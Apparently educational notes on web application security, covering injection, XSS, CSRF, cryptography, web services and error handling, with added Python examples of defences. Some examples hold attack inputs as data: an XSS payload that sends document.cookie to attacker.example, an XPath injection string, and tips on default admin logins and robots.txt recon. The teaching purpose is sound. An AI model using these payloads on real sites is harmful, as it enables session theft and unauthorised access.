32. These are bots (automated scanners) run by antivirus vendors, security organizations, search engines and others, cataloging every reachable web site.
33. The best known is Googlebot, http://en.wikipedia.org/wiki/Googlebot, which reads the site's robots.txt (see http://www.robotstxt.org/) to learn which paths the site wants crawled and which it wants left alone. Attackers usually do not respect this gentlemen's agreement; they read robots.txt precisely because its Disallow entries often point at admin, backup and other paths the site would rather nobody indexed.
34. There are so many scans on the Internet that many consider them white noise, and careers have been built on sifting through that white noise in network traffic.
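The point above about robots.txt as a recon source, as an added example that is not part of the original notes: a minimal robots.txt parser that collects the paths crawlers are told to avoid. The robots.txt text is constructed for the example, not fetched from any real site.

```python
# Added example (not from the original notes): a small robots.txt parser that
# extracts the paths a site asks crawlers to keep out of.  SAMPLE_ROBOTS_TXT is
# constructed for the demonstration, not fetched from any real site.

SAMPLE_ROBOTS_TXT = """\
# constructed sample for example.com
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/

User-agent: Googlebot
Disallow: /cgi-bin/
Crawl-delay: 10
"""


def parse_robots(text):
    """Return {user_agent: {"disallow": [...], "allow": [...]}}.

    Consecutive User-agent lines share one rule group; a blank line, or a
    User-agent line that follows rule lines, starts a new group.
    """
    rules = {}
    agents = []                 # agents the current group applies to
    group_has_rules = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            agents, group_has_rules = [], False  # blank line ends the group
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if group_has_rules:                  # new group without a blank line
                agents, group_has_rules = [], False
            agents.append(value)
            rules.setdefault(value, {"disallow": [], "allow": []})
        elif field in ("disallow", "allow"):
            group_has_rules = True
            if value:                            # bare "Disallow:" means allow all
                for agent in agents:
                    rules[agent][field].append(value)
        # other directives (Crawl-delay, Sitemap, ...) are ignored here
    return rules


def hidden_paths(text):
    """Every path any crawler is told to avoid: the list an attacker reads
    robots.txt for, since it often names admin and backup locations."""
    paths = set()
    for agent_rules in parse_robots(text).values():
        paths.update(agent_rules["disallow"])
    return sorted(paths)


if __name__ == "__main__":
    for path in hidden_paths(SAMPLE_ROBOTS_TXT):
        print(path)
```

The parser deliberately ignores Allow when building the hidden list: an attacker cares about what the site does not want indexed, not about what it permits.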
37. A well known database of such search keywords (Google dorks) is the Google Hacking Database at http://www.hackersforcharity.org/ghdb/ .
62. For example, a web page asks for a username and password and passes them to the database to validate them.
63. Some applications do not validate the fields adequately before passing them on, and the database processes whatever it receives.
64. Attackers pass SQL commands through those fields straight to the database; when the input is not filtered adequately, whole tables such as "passwords" can come back in the response.
69. Blind SQL injection is the case where the SQL commands still reach the database but nothing useful comes back: the page returns a generic error or a page-not-found response instead of data or a database error message. The attacker then has to infer the structure of the database behind the web server one yes/no question (or one timing difference) at a time.
107. The problem with JavaScript is the same as its purpose: the browser executes whatever script appears in the page, and that includes any script an attacker manages to put there.
108. Attackers can use JavaScript to send the browser to a different web site, to submit extra data, or to read data held in the browser itself such as cookies or session information.
109. The attacker takes advantage of being able to place or change content inside <script> … </script> tags, or to get script into the page by another route such as an event-handler attribute.
112. If that protection has to be turned off for legitimate reasons, it can be replaced by calling the encoders of the Anti-XSS 3.1 library from the code.
114. The Anti-XSS library can be broken down into two pieces: a library of protection routines (the Microsoft.Security.Application namespace) and a Security Runtime Engine (SRE) configuration utility.
115. The library routines encode output so that data that came in through an external field is rendered as text rather than executed, using the encoder that matches the context the data lands in (HTML text, attribute, JavaScript, URL).
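Context-aware output encoding, as an added example that is not from the original notes and not the Anti-XSS library itself (which is .NET). The standard-library html.escape and json.dumps stand in for its encoders; the PAYLOAD is a constructed attacker input reflected into three contexts, and the safe renderer encodes each one differently.

```python
import html
import json

# Added example (not from the original notes).  PAYLOAD is a constructed
# attacker input; html.escape and json.dumps stand in for the Anti-XSS
# encoders, which do the same job in ASP.NET.
PAYLOAD = '"><script>location="http://attacker.example/?c="+document.cookie</script>'


def render_unsafe(term):
    """Reflects the input into three contexts with no encoding at all."""
    return ('<p>Results for: %s</p>\n'
            '<input name="q" value="%s">\n'
            '<script>var q = "%s";</script>') % (term, term, term)


def js_string_literal(value):
    """JSON-encode for a JavaScript string and additionally escape < > &,
    so the literal can never contain a '</script>' that ends the block."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def render_safe(term):
    """Encode for the context each value lands in."""
    return ('<p>Results for: %s</p>\n'
            '<input name="q" value="%s">\n'
            '<script>var q = %s;</script>') % (
                html.escape(term),          # HTML text: & < > " ' become entities
                html.escape(term),          # attribute value: same set, quotes included
                js_string_literal(term))    # JavaScript string literal


def script_tag_count(markup):
    """Number of <script openings; the page template itself contributes one."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print("---")
    print(render_safe(PAYLOAD))
```

The JavaScript context is the one people get wrong: json.dumps alone would leave a literal "</script>" inside the string, and the HTML parser ends the script block there before the JavaScript parser ever sees the quotes.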
122. Different types of XSS have evolved, and new variants are discovered in the wild constantly.
125. The benefit to the attacker is this: if a hidden image whose URL points at the bank is injected into a page the victim views while their browser still holds the bank's authentication cookie, the browser attaches that cookie to the image request, and the attacker can act in the victim's authenticated session.
127. The reference could be any of several things, such as an image (<img>) or an XMLHttpRequest object. See http://www.cgisecurity.com/csrf-faq.htm
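The defence against the hidden-image attack above, as an added example that is not from the original notes: a simulated bank endpoint that refuses state changes over GET and requires a per-session anti-CSRF token that the attacker's page cannot obtain. The request dictionaries, session id and server secret are constructed stand-ins for a real web stack.

```python
import hashlib
import hmac
import secrets

# Added example (not from the original notes).  Request dicts, session ids
# and SERVER_SECRET are constructed stand-ins for a real web stack.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id, secret=SERVER_SECRET):
    """Per-session token derived from a server secret, so nothing has to be
    stored and a site the attacker controls cannot compute it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, presented, secret=SERVER_SECRET):
    if not presented:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), presented)


def handle_transfer(request, session_id):
    """Simulated bank endpoint.  The browser attaches the bank's session
    cookie to every request it sends to the bank, including one a planted
    <img> triggers, so the cookie alone cannot prove the user meant it."""
    if request["method"] != "POST":          # GET must never change state
        return 405, "state-changing request must be POST"
    form = request.get("form", {})
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, "transferred %s to %s" % (form["amount"], form["to"])


def legitimate_request(session_id):
    """The bank's own form carries the token in a hidden field."""
    return {"method": "POST",
            "form": {"to": "alice", "amount": "10",
                     "csrf_token": csrf_token(session_id)}}


def forged_image_request():
    """What <img src="https://bank.example/transfer?to=mallory&amount=1000">
    produces: a GET with query parameters and no token."""
    return {"method": "GET", "query": {"to": "mallory", "amount": "1000"}}


def forged_post_request():
    """An attacker page can auto-submit a POST form, but the same-origin
    policy keeps it from reading the token out of the bank's page."""
    return {"method": "POST", "form": {"to": "mallory", "amount": "1000"}}


if __name__ == "__main__":
    session = "sess-123"
    print(handle_transfer(legitimate_request(session), session))
    print(handle_transfer(forged_image_request(), session))
    print(handle_transfer(forged_post_request(), session))
```

Rejecting GET is not enough on its own, since the attacker can auto-submit a cross-site POST; the token is what ties the request to a page the user actually loaded from the bank.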
141. JSON is sometimes used to transfer data, for instance in Ajax, instead of XML.
142. JSON is used instead of XML because it has a smaller footprint and can be read directly into JavaScript objects.
143. JSON is normally identified by the MIME type "application/json" and the file extension ".json".
145. Data is usually retrieved asynchronously from the server using the XMLHttpRequest (XHR) object.
146. JavaScript (ECMAScript) does the local processing, and the Document Object Model (DOM) is used to access the data inside the page or to read XML returned by the server. The browser therefore sends and receives only the parts it needs to change and processes some of the data locally.
150. The browser has to interpret the JavaScript however it is encoded or obfuscated. If the browser can read it, so can an attacker, who can debug, monitor and manipulate it with a JavaScript debugger or de-obfuscator and intercept the functions it calls.
160. Flex uses the Flash plugin to run its GUI program. http://flex.org/
161. Silverlight programs use the Silverlight plugin as their runtime environment. http://www.silverlight.net/
162. Hacking tools, including web scanners, therefore normally need the plugin on the client as well in order to talk to these technologies.
163. Many attacks will now target not only the Flex or Silverlight deployment but the plugin itself as well.
165. Both can communicate and work with JavaScript, so both can be exposed to any XSS-style attack.
167. Flex uses MXML, the Macromedia XML, as a declarative layout of the interface; it is compiled into the SWF file that is deployed.
168. To extend the MXML, Flex uses a language called ActionScript, an ECMAScript dialect with Java-like class syntax. ActionScript can be embedded in the MXML file inside the <mx:Script> tag.
176. It then downloads the XAP file that contains the application. A XAP file is a standard .zip archive.
177. The Silverlight plugin reads the AppManifest.xaml file from the XAP to find out which assemblies the application uses. It creates the Silverlight runtime environment and then loads the application assembly (along with any dependent assemblies).
178. The Silverlight plugin creates an instance of the custom application class (defined in App.xaml and App.xaml.cs).
179. The default constructor of the application class raises the Startup event.
180. The application handles the Startup event and creates its root visual object.
182. SilverlightApplication3TestPage.aspx – an ASP.NET page that has to be deployed on a web server to test the Silverlight project SilverlightApplication3. It can be used as an entry point into the Silverlight application.
183. SilverlightApplication1TestPage.html – an HTML page that has to be deployed on a web server to test the Silverlight project SilverlightApplication3. It can be used as an entry point into the Silverlight application.
192. When a system is in production, and especially on the Internet, there is no guarantee that you know who is watching the data transmitted between the user and the server. The same applies to the local area network.
193. Never take it for granted that access cannot be broken.
194. Always use the standard, widely used algorithms that ship with the platform (in Java, those in its built-in crypto APIs). Common algorithms are well tested and vetted by millions of users; do not invent your own.
195. Keep the keys as secure as the data, because they unlock the data.
197. A one-way hash generates a fixed-size hash sum from data of any size.
198. The data cannot be recovered from the hash, hence one-way.
200. Different data generates different hash sums. (Note: in rare cases, called collisions, different data generates the same sum.)
202. The 128-bit hash sum (MD5) can be used to check whether data or a file has been tampered with. Two caveats: MD5 collisions can be manufactured deliberately today, so prefer SHA-256 or another SHA-2 hash for integrity checks; and a hash stored next to the data can simply be recomputed by whoever tampered with the data, unless the hash is keyed (HMAC) or signed.
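The tamper check described above and its limit, as an added example that is not from the original notes: a plain hash catches a changed file but not an attacker who rewrites the stored hash as well, while a keyed hash (HMAC) does. ORIGINAL, TAMPERED and MAC_KEY are constructed values.

```python
import hashlib
import hmac

# Added example (not from the original notes).  ORIGINAL/TAMPERED are
# constructed file contents; MAC_KEY is a constructed server-side secret.
ORIGINAL = b"pay 100.00 to alice\n"
TAMPERED = b"pay 900.00 to mallory\n"
MAC_KEY = b"constructed-secret-key-kept-off-the-web-server"


def digest_hex(data, algorithm="sha256"):
    """One-way hash: fixed-size output however long the input.  'md5' gives
    the 128-bit sum the notes mention; 'sha256' gives 256 bits."""
    return hashlib.new(algorithm, data).hexdigest()


def verify_plain(data, expected_hex, algorithm="sha256"):
    """Unkeyed check.  compare_digest avoids leaking where the first
    mismatching byte is through timing."""
    return hmac.compare_digest(digest_hex(data, algorithm), expected_hex)


def mac_hex(data, key=MAC_KEY):
    """Keyed hash (HMAC-SHA256): recomputing it requires the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_mac(data, expected_hex, key=MAC_KEY):
    return hmac.compare_digest(mac_hex(data, key), expected_hex)


if __name__ == "__main__":
    stored = digest_hex(ORIGINAL)
    print("plain hash detects tampering:", not verify_plain(TAMPERED, stored))
    # attacker overwrites both the file and the hash stored beside it
    print("plain hash after attacker recomputes:", verify_plain(TAMPERED, digest_hex(TAMPERED)))
    tag = mac_hex(ORIGINAL)
    print("HMAC detects tampering:", not verify_mac(TAMPERED, tag))
```

The keyed check only helps if MAC_KEY lives somewhere the attacker who can edit the file cannot read, which is the same "keys as secure as the data" rule the notes state.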
207. The Rijndael algorithm, developed by the two Belgian cryptographers Joan Daemen and Vincent Rijmen, was selected.
208. NIST adopted it with a 128-bit block and key sizes of 128, 192 or 256 bits as FIPS 197 and called it AES.
210. An asymmetric algorithm generates a key pair: a private key that the owner keeps and a public key that is handed out to everyone else. Anyone can encrypt to the owner with the public key and only the private key can decrypt; conversely, the private key signs and the public key verifies the signature.
212. RSA keys, a simple encrypt/decrypt example: public key = (e, n) = (17, 3233), private key = (d, n) = (2753, 3233). To compute the ciphertext we use C = P^e mod n. For example, take P = 65, the ASCII code for the letter 'A': C = 65^17 mod 3233 = 2790. Back to plaintext, P = C^d mod n: P = 2790^2753 mod 3233 = 65, which is 'A' again.
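The numbers above carried through in code, as an added example that is not from the original notes. The notes give only e, d and n; the example assumes p = 61 and q = 53, the two primes whose product is 3233, and adds the signing direction and a trial-division factoring step to show why these sizes are for teaching only.

```python
from math import gcd, isqrt

# Added example (not from the original notes) reproducing the notes' numbers.
# Assumption: 3233 = 61 * 53, so p = 61 and q = 53 are the primes behind the n
# the notes give; the notes list only e, d and n.


def rsa_keygen(p, q, e=17):
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)                 # modular inverse (Python 3.8+)
    return (e, n), (d, n)               # public key, private key


def encrypt(plaintext, public_key):
    e, n = public_key
    return pow(plaintext, e, n)         # C = P^e mod n


def decrypt(ciphertext, private_key):
    d, n = private_key
    return pow(ciphertext, d, n)        # P = C^d mod n


def sign(message, private_key):
    """Signing is the private-key operation; anyone holding the public key
    can check it.  Real systems sign a padded hash, never a raw integer."""
    d, n = private_key
    return pow(message, d, n)


def verify(message, signature, public_key):
    e, n = public_key
    return pow(signature, e, n) == message


def factor_by_trial(n):
    """Why toy sizes are only for teaching: a 12-bit n falls to trial
    division instantly, and with p and q anyone can recompute d."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    return None


if __name__ == "__main__":
    pub, priv = rsa_keygen(61, 53)
    print("public", pub, "private", priv)
    c = encrypt(65, pub)
    print("encrypt(65) =", c, "decrypt ->", decrypt(c, priv), chr(decrypt(c, priv)))
    print("factors of n:", factor_by_trial(pub[1]))
```

Note that textbook RSA is deterministic: encrypting the same letter always gives the same number, so a one-letter-at-a-time scheme like the one in the notes is a substitution cipher an attacker can tabulate with the public key alone. Real deployments use randomised padding (OAEP) and key sizes of 2048 bits or more.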
218. A larger, combined piece is the digital certificate.
219. A digital certificate is an X.509 data structure that binds a public key to an identity. The certificate itself can be verified (it is signed), it supports authentication and non-repudiation of what its owner signs (proof of origin; a signature is not proof of receipt), and it carries third-party vouching through a Certificate Authority.
220. The digital certificate is the heart of HTTPS (HTTP over TLS, formerly SSL) and of Public Key Infrastructure (PKI).
221. PKI is the process of authentication through a trusted party called a Certificate Authority (CA). This can be a commercial third party or an internal CA, for example one integrated with the Windows domain.
225. Web sites can at times be accessed by typing "admin" / "admin", and auditors try a range of default and well-known logins.
228. The eXtensible Markup Language (XML) defines the interfaces and the content of the messages.
231. UDDI is a directory service that provides discovery of services and retrieval of their WSDL descriptions. It may require authentication and may run over HTTPS.
232. UDDI returns the WSDL and points the client at the endpoint that hosts the service, usually in the form of a URL.
233. The WSDL defines the acceptable interface into the service.
234. The client's SOAP call formats the XML accordingly; SOAP acts as the envelope around the message to the service.
235. The service accepts the call if it meets the WSDL criteria and processes it.
242. A guide for writing Secure Web Services can be found at http://wcfsecurityguide.codeplex.com/releases/view/15892
243. Like other frameworks, for example Apache's Axis2, WCF supports authentication, authorization, secure transport, tokens and signatures in web services. The difference is that WCF is fully integrated into .NET.
246. There are several types of bindings: HTTP, MSMQ, TCP, etc. A binding selects the communication protocol being used, for instance SOAP over TCP, and it also carries the security settings that give the web service end-to-end security.
247. The contract is the service contract that the service exposes to its various clients.
248. WCF supports strongly typed messaging and also untyped messaging, built on top of .NET.
256. Start by creating a Console Application in C#, then add the "System.ServiceModel" reference and the matching "using System.ServiceModel;" in Program.cs.
264. The difference when hacking web services is that the attacks are transmitted in an XML field (XML being similar to HTML) instead of an HTML form field.
265. In other words, the XML must be parsed so that the attack goes into the "username" element of the XML message instead of the "username" form field in HTML.
267. XPath uses path expressions to traverse the nodes of an XML document and look for specific information.
268. XPath injection is similar to SQL injection except that the query syntax is slightly different and XML is the attack vector.
269. One example is to pass ' or 1=1 or ' '=' as the username to trick the XPath query into matching a valid user regardless of the credentials supplied:
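The injection above and its fix, as an added example that is not from the original notes: the query string an injectable application would hand to its XPath engine, a proper XPath 1.0 string-literal quoter (XPath has no escape character, so values containing both quote kinds go through concat()), and a lookup that compares values in code rather than in a query. The user store is constructed; Python's ElementTree cannot evaluate "or" predicates, so the vulnerable query is shown as a string rather than executed.

```python
import xml.etree.ElementTree as ET

# Added example (not from the original notes).  USERS_XML is a constructed
# user store for an XPath-backed login.

USERS_XML = """<users>
  <user><name>alice</name><password>Wonderland1</password></user>
  <user><name>admin</name><password>s3cretP@ss</password></user>
</users>"""


def build_query_vulnerable(username, password):
    """The string an injectable application hands to its XPath engine:
    input pasted straight into the predicate."""
    return "//user[name='%s' and password='%s']" % (username, password)


def xpath_literal(value):
    """Quote a value as an XPath 1.0 string literal.  XPath has no escape
    character inside literals, so a value holding both quote kinds is
    assembled with concat()."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(%s)" % ", \"'\", ".join("'%s'" % p for p in parts)


def build_query_safe(username, password):
    """Same query with every user value turned into a literal, so a quote
    in the input can no longer end the literal and start a new condition."""
    return "//user[name=%s and password=%s]" % (
        xpath_literal(username), xpath_literal(password))


def login(xml_text, username, password):
    """Safe lookup without an XPath engine: walk the nodes and compare in
    code.  ElementTree's limited XPath subset cannot evaluate 'or'
    predicates, which is why the comparison is done in Python here."""
    root = ET.fromstring(xml_text)
    for user in root.iter("user"):
        if (user.findtext("name") == username
                and user.findtext("password") == password):
            return True
    return False


if __name__ == "__main__":
    payload = "' or 1=1 or ' '='"
    print(build_query_vulnerable(payload, "x"))   # predicate is always true
    print(build_query_safe(payload, "x"))         # payload is just a name
    print(login(USERS_XML, payload, "x"))
```

In the vulnerable query the predicate reads name='' or 1=1 or ..., which is true for every user node, so the first user in the document is returned whatever the password was.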
313. With adequate logging of authorization decisions, access to sensitive information, and any anomalous interaction with the system, a proper recovery of the system is usually possible.
314. The logs should be stored on a different system in case the web system is ever compromised, one the web system sends to but never asks for anything back.
318. There are three components to handling an exception: the "try", "catch" and "finally" blocks.
319. The "try" block encloses the normal code that may throw an exception, the "catch" block catches the exception and handles it, and the "finally" block does the cleanup afterwards whether or not an exception was thrown.
320. The "catch" block can log the anomaly, stop the program, or handle it in a hundred other ways; what it must not do is pass the raw exception text on to the user.
324. A platform's built-in logging framework (on Java, java.util.logging, which changes destinations through Handler entries in logging.properties) can redirect log output, but log4net offers more advanced features through its Appender classes, configured in XML.
325. log4net is configured in XML (in App.config/Web.config or a separate file); its Java counterpart log4j additionally accepts a text log4j.properties file.
332. An error page giving details like a database or table name may be more than enough to give an attacker the information to launch an attack at the web site.
335. Web error pages: many web sites use the default error pages, which show the user the exceptions, including exceptions raised by the database. Database exceptions have a tendency to display table names and the failed SQL statement, which can be used for further probing. To send all errors to a custom error page in ASP.NET, set in web.config: <customErrors mode="On" defaultRedirect="errors/ErrorPage.aspx"></customErrors>
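The try/catch/finally pattern and the error-page point above put together, as an added example that is not from the original notes: one handler that returns the raw database exception to the user (the default-error-page behaviour) beside one that logs the full detail to a separate sink and returns only a generic message with an opaque incident reference. The in-memory log sink stands in for the separate log host the notes recommend, and the missing "orders" table is constructed to provoke an error whose text names a table.

```python
import logging
import sqlite3
import uuid
from io import StringIO

# Added example (not from the original notes).  LOG_SINK stands in for the
# separate log host the notes recommend; the missing "orders" table is
# constructed to provoke a database error whose text names a table.
LOG_SINK = StringIO()
_handler = logging.StreamHandler(LOG_SINK)
_handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
log = logging.getLogger("webapp.example")
log.addHandler(_handler)
log.setLevel(logging.INFO)
log.propagate = False


def query_orders(conn, customer_id):
    return conn.execute("SELECT id FROM orders WHERE customer_id = ?",
                        (customer_id,)).fetchall()


def handle_request_leaky(conn, customer_id):
    """Default error page behaviour: the exception text reaches the user."""
    try:
        return 200, {"orders": query_orders(conn, customer_id)}
    except sqlite3.Error as exc:
        return 500, {"error": str(exc)}


def handle_request(conn, customer_id):
    """try / catch / finally as in the notes: full detail goes to the log,
    an opaque reference goes to the user so support can match the two."""
    incident = uuid.uuid4().hex[:8]
    try:
        return 200, {"orders": query_orders(conn, customer_id)}
    except sqlite3.Error as exc:
        log.error("incident %s: database error for customer %r: %s",
                  incident, customer_id, exc)
        return 500, {"error": "An internal error occurred.", "ref": incident}
    finally:
        log.info("incident %s: request finished", incident)   # runs either way


if __name__ == "__main__":
    db = sqlite3.connect(":memory:")
    print("leaky:", handle_request_leaky(db, 7))
    print("safe: ", handle_request(db, 7))
    print("log sink contents:\n" + LOG_SINK.getvalue())
```

The reference in the user-facing message is the only link between what the user sees and the log line; it carries no information about the failure itself.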